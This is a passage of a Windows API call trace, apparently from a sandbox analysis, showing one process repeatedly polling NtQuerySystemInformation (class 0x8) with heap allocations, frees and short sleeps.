[0240.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.021] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.021] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.023] Sleep (dwMilliseconds=0x110) [0240.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.032] Sleep (dwMilliseconds=0x110) [0240.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.049] Sleep (dwMilliseconds=0x110) [0240.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.064] Sleep (dwMilliseconds=0x110) [0240.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.082] Sleep (dwMilliseconds=0x110) [0240.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.098] Sleep (dwMilliseconds=0x110) [0240.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.113] Sleep (dwMilliseconds=0x110) [0240.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.130] Sleep (dwMilliseconds=0x110) [0240.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.138] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.141] Sleep (dwMilliseconds=0x110) [0240.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.191] Sleep (dwMilliseconds=0x110) [0240.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.251] Sleep (dwMilliseconds=0x110) [0240.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.303] Sleep (dwMilliseconds=0x110) [0240.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0240.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.317] Sleep (dwMilliseconds=0x110) [0240.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0240.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0240.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0240.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0240.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0240.333] 